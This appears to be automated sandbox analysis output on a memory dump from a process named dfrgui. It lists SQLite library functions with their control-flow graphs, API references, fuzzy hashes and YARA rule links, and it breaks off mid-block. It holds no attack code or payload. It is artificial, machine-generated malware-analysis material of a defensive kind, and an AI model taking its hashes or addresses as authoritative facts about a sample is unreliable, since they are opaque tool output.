                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 768 61e18064-61e180db GetSystemInfo sqlite3_vfs_register * 4
                                  APIs
                                  • GetSystemInfo.KERNEL32(?,?,61E9E560,?,61E17E31,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E1807E
                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18094
                                    • Part of subcall function 61E18001: sqlite3_initialize.SQLITE3(?,?,61E18099), ref: 61E1800C
                                    • Part of subcall function 61E18001: sqlite3_mutex_enter.SQLITE3(?,?,61E18099), ref: 61E18024
                                    • Part of subcall function 61E18001: sqlite3_mutex_leave.SQLITE3(?), ref: 61E18056
                                  • sqlite3_vfs_register.SQLITE3 ref: 61E180A8
                                  • sqlite3_vfs_register.SQLITE3 ref: 61E180BC
                                  • sqlite3_vfs_register.SQLITE3 ref: 61E180D0
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID:
                                  • API String ID: 3532963230-0
                                  • Opcode ID: efbbbe0f69969b7faee05e120b58cf032d4d47dc79d4c9ab9d725874a9c41882
                                  • Instruction ID: 892981d2b28edd46e9514985aa496d13bef9ba5fb41b3714e8a549afe22bdfca
                                  • Opcode Fuzzy Hash: efbbbe0f69969b7faee05e120b58cf032d4d47dc79d4c9ab9d725874a9c41882
                                  • Instruction Fuzzy Hash: 8FF0FEB0108A459BD780AF65C507B2EBAE5BFC5748F21CC1DD58887285C776D484AB53
                                  Function 61E43F0E Relevance: 41.0, APIs: 21, Strings: 2, Instructions: 761stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                  • String ID: -journal$@
                                  • API String ID: 42632313-41206085
                                  • Opcode ID: e5d5e28eb2bf7ee6687f9820fbbff51fb288927651061ecb236297071521615b
                                  • Instruction ID: f9e63cc358ab8c647309976e18e9646e7e1eb105b7056754fcda2e4ce6371224
                                  • Opcode Fuzzy Hash: e5d5e28eb2bf7ee6687f9820fbbff51fb288927651061ecb236297071521615b
                                  • Instruction Fuzzy Hash: 8982F274A04259CFEB10CF68D884B89BBF1BF49308F2981EAD8589B352D774E985CF51
                                  Function 61E17C24 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 197COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 392 61e17c24-61e17c2d 393 61e17c33-61e17c45 call 61e08c8b 392->393 394 61e17f66 392->394 397 61e17c4b-61e17c71 call 61e01704 sqlite3_mutex_enter 393->397 398 61e17f5f-61e17f65 393->398 401 61e17c77-61e17c7e 397->401 402 61e17d0e-61e17d1f 397->402 398->394 405 61e17c80-61e17c8f sqlite3_config 401->405 406 61e17c94-61e17cba call 61e01704 401->406 403 61e17d41-61e17d66 sqlite3_mutex_leave sqlite3_mutex_enter 402->403 404 61e17d21-61e17d37 call 61e01704 402->404 408 61e17f00-61e17f25 sqlite3_mutex_leave sqlite3_mutex_enter 403->408 409 61e17d6c-61e17d73 403->409 404->403 416 61e17d39-61e17d3b 404->416 405->406 418 61e17cd1-61e17cdb 406->418 419 61e17cbc-61e17cc6 406->419 412 61e17f27-61e17f34 sqlite3_mutex_free 408->412 413 61e17f3e-61e17f4b sqlite3_mutex_leave 408->413 409->408 414 61e17d79-61e17dc7 call 61e0fa8a * 3 409->414 412->413 413->398 431 61e17dc9-61e17de6 sqlite3_malloc 414->431 432 61e17ded-61e17df4 414->432 416->403 420 61e17f4d 416->420 423 61e17ce5-61e17cf7 418->423 419->418 422 61e17cc8-61e17ccf 419->422 424 61e17f52-61e17f5d sqlite3_mutex_leave 420->424 422->418 422->423 423->402 428 61e17cf9-61e17d09 423->428 424->398 428->424 433 61e17e24-61e17e35 sqlite3_free sqlite3_os_init 431->433 434 61e17de8 431->434 435 61e17df6-61e17e05 sqlite3_config 432->435 436 61e17e0a-61e17e1c 432->436 437 61e17ef6 433->437 438 61e17e3b-61e17e42 433->438 434->437 435->436 436->437 442 61e17e22 436->442 437->408 440 61e17e48-61e17e5b 438->440 441 61e17eec 438->441 443 61e17e64-61e17e66 440->443 444 61e17e5d-61e17e62 440->444 441->437 442->431 445 61e17e68-61e17e87 443->445 444->445 446 61e17e91-61e17eb8 445->446 447 61e17e89-61e17e8e 445->447 448 61e17ebc-61e17ec3 446->448 447->446 449 61e17ec5-61e17ed2 448->449 450 61e17ed4-61e17ede 448->450 449->448 451 61e17ee0 450->451 452 61e17ee6 450->452 451->452 452->441
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17D4D
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17D5A
                                  • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17DDF
                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17E05
                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17E27
                                  • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17E2C
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F08
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F13
                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F2F
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F44
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                  • String ID: ua
                                  • API String ID: 1590227068-1430901121
                                  • Opcode ID: 2c517c6967f8d847ff255873c53fe19bc49bb20f36ac071f613cc6e575805732
                                  • Instruction ID: effbe140fe4685b051a8e25f96754bb5232c6cc9f828b50d76ca8a27d9cc9e44
                                  • Opcode Fuzzy Hash: 2c517c6967f8d847ff255873c53fe19bc49bb20f36ac071f613cc6e575805732
                                  • Instruction Fuzzy Hash: AF813870A28F418FEB419FAAC44635E7AE1BB4B70DF24882DD4588B384D779D8C5CB52
                                  Function 61E3A09F Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 290fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 453 61e3a09f-61e3a0dd 454 61e3a0df-61e3a0f1 call 61e39db8 453->454 455 61e3a0fd-61e3a10a call 61e17674 453->455 460 61e3a0f7-61e3a0fa 454->460 461 61e3a4bd-61e3a4c6 454->461 462 61e3a121-61e3a129 455->462 463 61e3a10c-61e3a11c sqlite3_free 455->463 460->455 464 61e3a144-61e3a14b sqlite3_win32_is_nt 462->464 465 61e3a12b-61e3a142 462->465 463->461 464->465 467 61e3a14d-61e3a15a 464->467 466 61e3a16d-61e3a18a 465->466 471 61e3a15c-61e3a16b call 61e17525 466->471 472 61e3a18c 466->472 470 61e3a18f-61e3a192 467->470 474 61e3a194-61e3a19c 470->474 475 61e3a1be 470->475 471->466 477 61e3a1c0-61e3a1ef 471->477 472->470 474->477 478 61e3a19e-61e3a1b9 sqlite3_free * 2 474->478 475->477 479 61e3a203-61e3a227 477->479 480 61e3a1f1-61e3a1ff 477->480 478->461 481 61e3a236-61e3a277 CreateFileW 479->481 482 61e3a229-61e3a230 sqlite3_win32_is_nt 479->482 480->479 484 61e3a364-61e3a374 call 61e26d50 481->484 485 61e3a27d-61e3a281 481->485 482->481 483 61e3a2e9-61e3a32a 482->483 493 61e3a2d4-61e3a2d8 483->493 494 61e3a32c 483->494 497 61e3a37a-61e3a394 sqlite3_free * 2 484->497 498 61e3a3fc-61e3a400 484->498 486 61e3a283-61e3a2ad call 61e26d8f 485->486 487 61e3a2b9-61e3a2c6 call 61e17525 485->487 486->487 501 61e3a2af-61e3a2b3 486->501 487->481 502 61e3a2cc-61e3a2cf 487->502 505 61e3a2da-61e3a2e7 call 61e17525 493->505 506 61e3a32e-61e3a358 call 61e26d8f 493->506 494->484 503 61e3a396-61e3a39a 497->503 504 61e3a3c8-61e3a3f0 call 61e2640a call 61e28f47 497->504 499 61e3a402-61e3a40e 498->499 500 61e3a410-61e3a439 sqlite3_free * 2 498->500 499->500 508 61e3a43b 500->508 509 61e3a43d-61e3a44c 500->509 501->484 501->487 502->484 503->504 510 61e3a39c-61e3a3c6 call 61e3a09f 503->510 524 61e3a3f5-61e3a3f7 504->524 505->483 505->502 506->505 520 61e3a35a-61e3a35e 506->520 508->509 515 61e3a452-61e3a46f sqlite3_uri_boolean 509->515 516 61e3a44e 509->516 510->524 521 61e3a471 515->521 522 61e3a475-61e3a4ba 515->522 516->515 520->484 520->505 521->522 522->461 524->461
                                  APIs
                                  • sqlite3_free.SQLITE3 ref: 61E3A117
                                    • Part of subcall function 61E39DB8: sqlite3_free.SQLITE3 ref: 61E39E2A
                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E3A144
                                  • sqlite3_free.SQLITE3 ref: 61E3A1A9
                                  • sqlite3_free.SQLITE3 ref: 61E3A1B4
                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E3A229
                                  • CreateFileW.KERNEL32 ref: 61E3A269
                                  • sqlite3_free.SQLITE3 ref: 61E3A380
                                  • sqlite3_free.SQLITE3 ref: 61E3A38B
                                    • Part of subcall function 61E17525: sqlite3_win32_sleep.SQLITE3 ref: 61E1757D
                                  • sqlite3_free.SQLITE3 ref: 61E3A41F
                                  • sqlite3_free.SQLITE3 ref: 61E3A42A
                                  • sqlite3_uri_boolean.SQLITE3 ref: 61E3A468
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                  • String ID: winOpen
                                  • API String ID: 1995518269-2556188131
                                  • Opcode ID: 02ae4fc1cf8e0ab259eeb628cbf22a4e3df4fa882fbeb90c31a7796b48fffbbd
                                  • Instruction ID: 2e7a51ccf81338f6de1aff17c3b406eeeda581b4f8dc1a14108cc5d93c6a17f6
                                  • Opcode Fuzzy Hash: 02ae4fc1cf8e0ab259eeb628cbf22a4e3df4fa882fbeb90c31a7796b48fffbbd
                                  • Instruction Fuzzy Hash: 19D1C4709047598FDB10DFA8C58478EBBF0BF89358F208A29E8A9DB350D775D885CB41
                                  Function 61E5E64D Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 218COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 525 61e5e64d-61e5e6ce call 61e6bc76 528 61e5e6d4-61e5e6e8 525->528 529 61e5e8f7-61e5e8fb 525->529 532 61e5e6f7-61e5e70a call 61e12e95 528->532 533 61e5e6ea-61e5e6f2 528->533 530 61e5e906-61e5e908 call 61e0a424 529->530 531 61e5e8fd-61e5e904 529->531 534 61e5e90d-61e5e917 call 61e11e95 530->534 531->530 531->534 541 61e5e70c-61e5e70e call 61e3d45e 532->541 542 61e5e739-61e5e73e 532->542 536 61e5e92b-61e5e93f 533->536 534->536 546 61e5e713-61e5e71e 541->546 543 61e5e741-61e5e756 call 61e131ff 542->543 549 61e5e758-61e5e765 543->549 546->542 548 61e5e720-61e5e734 call 61e0bdfd call 61e111a1 546->548 563 61e5e8e9-61e5e8f5 call 61e0ae57 548->563 552 61e5e767-61e5e76b 549->552 553 61e5e788-61e5e792 549->553 555 61e5e76d-61e5e777 552->555 556 61e5e779-61e5e784 552->556 557 61e5e797-61e5e7a7 553->557 555->557 559 61e5e786 556->559 560 61e5e7ec-61e5e801 call 61e111a1 556->560 561 61e5e7a9-61e5e7c3 call 61e021c8 call 61e13631 557->561 562 61e5e7c8-61e5e7d8 557->562 559->557 575 61e5e807-61e5e921 call 61e0ae57 560->575 576 61e5e8e1-61e5e8e4 call 61e42d7b 560->576 561->562 564 61e5e7de-61e5e7e5 562->564 565 61e5e7da 562->565 563->529 563->536 570 61e5e7e7 564->570 571 61e5e80c-61e5e80f 564->571 565->564 570->560 577 61e5e811-61e5e815 571->577 578 61e5e81b-61e5e897 call 61e2d856 sqlite3_exec call 61e0f55b 571->578 575->529 576->563 577->578 580 61e5e817 577->580 588 61e5e8a3-61e5e8a7 578->588 589 61e5e899-61e5e89e call 61e5e573 578->589 580->578 591 61e5e8b7-61e5e8b9 588->591 592 61e5e8a9-61e5e8b5 call 61e12f5e 588->592 589->588 594 61e5e8d2-61e5e8d6 591->594 595 61e5e8bb-61e5e8ce 591->595 592->594 594->595 599 61e5e8d8-61e5e8df 594->599 597 61e5e8d0 595->597 598 61e5e923-61e5e926 call 61e0ae57 595->598 597->576 598->536 599->563 599->576
                                  Strings
                                  • unsupported file format, xrefs: 61E5E7E7
                                  • attached databases must use the same text encoding as main database, xrefs: 61E5E77D
                                  • sqlite_temp_master, xrefs: 61E5E66B
                                  • %a, xrefs: 61E5E696
                                  • sqlite_master, xrefs: 61E5E665
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format$%a
                                  • API String ID: 0-1599144592
                                  • Opcode ID: eb07146dd19bf2155118879b50791f2581f6e4c6be82e6bf9c0934a5e103759a
                                  • Instruction ID: 81ca86a02b8e90fec50f3eeef60e3b279eb0fa66c1630af5bf9a7ca8267cbba4
                                  • Opcode Fuzzy Hash: eb07146dd19bf2155118879b50791f2581f6e4c6be82e6bf9c0934a5e103759a
                                  • Instruction Fuzzy Hash: 2FA12274A04B898BDB51CFAAC484B8DFBF1AF88308F24C46DD858AB355D736E855CB41
                                  Function 61E13E1C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 601 61e13e1c-61e13e2d 602 61e13e42-61e13e57 sqlite3_mutex_enter 601->602 603 61e13e2f-61e13e32 call 61e0ff10 601->603 605 61e13e99-61e13ea8 sqlite3_mutex_leave 602->605 606 61e13e59-61e13e82 602->606 607 61e13e37-61e13e3b 603->607 610 61e13eea-61e13ef3 605->610 611 61e13eaa 605->611 608 61e13e84 606->608 609 61e13e8a-61e13e94 call 61e0149c 606->609 612 61e13e3d 607->612 613 61e13eac-61e13ec9 call 61e017b3 sqlite3_mutex_enter 607->613 608->609 609->605 611->603 612->610 617 61e13ed1-61e13ee5 call 61e0149c sqlite3_mutex_leave 613->617 618 61e13ecb 613->618 617->610 618->617
                                  APIs
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13F66), ref: 61E13E4A
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13F66), ref: 61E13EA1
                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,00000000,?,61E13F66), ref: 61E13EBE
                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,00000000,?,61E13F66), ref: 61E13EE5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                  • String ID: ,a
                                  • API String ID: 1477753154-370703091
                                  • Opcode ID: d1574cd2befc67b3da9df7fa7a9b76aa710c1d09face6bc0d125a6ecb0ad5971
                                  • Instruction ID: 8f7efb0d6392b5c6d9188a8c54c9a977b738bcd83500ede98cc91c7b45db2505
                                  • Opcode Fuzzy Hash: d1574cd2befc67b3da9df7fa7a9b76aa710c1d09face6bc0d125a6ecb0ad5971
                                  • Instruction Fuzzy Hash: C2112374A28F418FDB00EFAAC08161577E4BB46319B258C3FEA44CB304E774D8E18B52
                                  Function 61E3D45E Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 426COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 621 61e3d45e-61e3d47d call 61e12e95 624 61e3d483-61e3d487 621->624 625 61e3d9a9-61e3d9ab 621->625 626 61e3d493-61e3d499 624->626 627 61e3d489-61e3d48d 624->627 628 61e3d9b6-61e3d9b8 625->628 629 61e3d4a7-61e3d4ab 626->629 630 61e3d49b-61e3d49f 626->630 627->626 627->628 631 61e3d9e1-61e3d9f8 call 61e0ae57 628->631 632 61e3d9ba-61e3d9be 628->632 636 61e3d4b3-61e3d4b5 629->636 637 61e3d4ad-61e3d4b1 629->637 634 61e3d4a5 630->634 635 61e3d9ad-61e3d9b2 630->635 632->631 638 61e3d9c0-61e3d9d2 632->638 634->636 635->628 641 61e3d4b7-61e3d4bc 636->641 642 61e3d4be-61e3d4c2 636->642 637->636 637->641 638->631 639 61e3d9d4-61e3d9d8 638->639 639->631 644 61e3d9da-61e3d9df call 61e1241d 639->644 643 61e3d4db-61e3d4e2 641->643 645 61e3d4c4 642->645 646 61e3d4e8-61e3d4fc call 61e02c0f 642->646 643->628 643->646 644->631 648 61e3d4c7-61e3d4c9 645->648 655 61e3d502-61e3d511 646->655 656 61e3d9b4 646->656 648->646 651 61e3d4cb-61e3d4d0 648->651 653 61e3d4d2-61e3d4d4 651->653 654 61e3d4d6-61e3d4d9 651->654 653->643 654->648 657 61e3d513-61e3d516 655->657 658 61e3d51a-61e3d51f 655->658 656->628 657->658 659 61e3d522-61e3d526 658->659 660 61e3d787-61e3d789 659->660 661 61e3d52c-61e3d537 call 61e3c53c 659->661 662 61e3d8d9-61e3d8db 660->662 663 61e3d78f-61e3d793 660->663 661->660 670 61e3d53d-61e3d54e call 61e02fba 661->670 666 61e3d8e1-61e3d8eb call 61e3c335 662->666 667 61e3d8dd-61e3d8df 662->667 663->662 668 61e3d799-61e3d7a2 663->668 671 61e3d8ee-61e3d8f1 666->671 667->671 668->666 669 61e3d7a8-61e3d7af 668->669 669->666 673 61e3d7b5-61e3d7c6 669->673 680 61e3d553-61e3d557 670->680 676 61e3d8f3-61e3d8f7 671->676 677 61e3d918-61e3d91a 671->677 678 61e3d8ca-61e3d8ce 673->678 679 61e3d7cc-61e3d7d4 673->679 676->628 681 61e3d8fd-61e3d90d call 61e05766 676->681 677->628 682 61e3d920-61e3d927 677->682 678->667 687 61e3d8d0-61e3d8d7 call 61e3d3a6 678->687 683 61e3d7da-61e3d7de 679->683 684 61e3d89e-61e3d8b0 call 61e145d1 679->684 680->660 685 61e3d55d-61e3d577 680->685 681->659 705 61e3d913 681->705 688 61e3d947-61e3d959 682->688 689 61e3d929-61e3d930 682->689 692 61e3d7e0-61e3d7e4 683->692 693 61e3d814-61e3d823 683->693 710 61e3d8b2-61e3d8b4 684->710 711 61e3d8c4-61e3d8c6 684->711 695 61e3d5a7-61e3d5aa 685->695 696 61e3d579-61e3d5a5 memcmp 685->696 687->662 690 61e3d95b 688->690 691 61e3d95e-61e3d962 688->691 689->688 699 61e3d932-61e3d944 689->699 690->691 691->631 701 61e3d964-61e3d978 691->701 692->693 702 61e3d7e6-61e3d7f6 call 61e145d1 692->702 693->666 706 61e3d829-61e3d83b call 61e0ad97 693->706 704 61e3d5ad-61e3d5b1 695->704 696->704 699->688 707 61e3d97a 701->707 708 61e3d97d-61e3d98c 701->708 702->666 724 61e3d7fc-61e3d810 call 61e0ad75 702->724 712 61e3d5b7-61e3d5d4 memcmp 704->712 713 61e3d709-61e3d761 704->713 705->628 706->666 729 61e3d841-61e3d863 memcmp 706->729 707->708 708->638 715 61e3d98e-61e3d99a call 61e3afbc 708->715 710->711 717 61e3d8b6-61e3d8c2 call 61e14620 710->717 720 61e3d865-61e3d883 711->720 721 61e3d8c8 711->721 718 61e3d766 712->718 719 61e3d5da-61e3d5e1 712->719 713->659 715->628 737 61e3d99c-61e3d9a7 715->737 717->711 726 61e3d76b-61e3d77d call 61e3c30e 718->726 727 61e3d5e3 719->727 728 61e3d5e8-61e3d5ec 719->728 720->678 721->666 724->693 744 61e3d77f-61e3d781 726->744 727->728 728->718 735 61e3d5f2 728->735 729->720 730 61e3d885-61e3d89c call 61e0adf2 729->730 730->666 740 61e3d633-61e3d653 memcmp 735->740 741 61e3d5f4-61e3d5f8 735->741 737->628 740->718 743 61e3d659-61e3d674 740->743 741->740 745 61e3d5fa-61e3d612 call 61e8b455 741->745 743->718 746 61e3d67a-61e3d685 743->746 744->659 744->660 745->726 750 61e3d618-61e3d61f 745->750 746->718 749 61e3d68b-61e3d69a 746->749 751 61e3d6cf-61e3d6d6 749->751 752 61e3d69c-61e3d6ca call 61e3c30e call 61e0af1f call 61e13ef4 749->752 750->740 755 61e3d621-61e3d62e call 61e3c30e 750->755 753 61e3d6d8-61e3d6de 751->753 754 61e3d6ee-61e3d6f4 751->754 752->744 753->754 757 61e3d6e0-61e3d6ec call 61e274a8 753->757 754->718 759 61e3d6f6-61e3d705 754->759 755->659 757->726 759->713
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
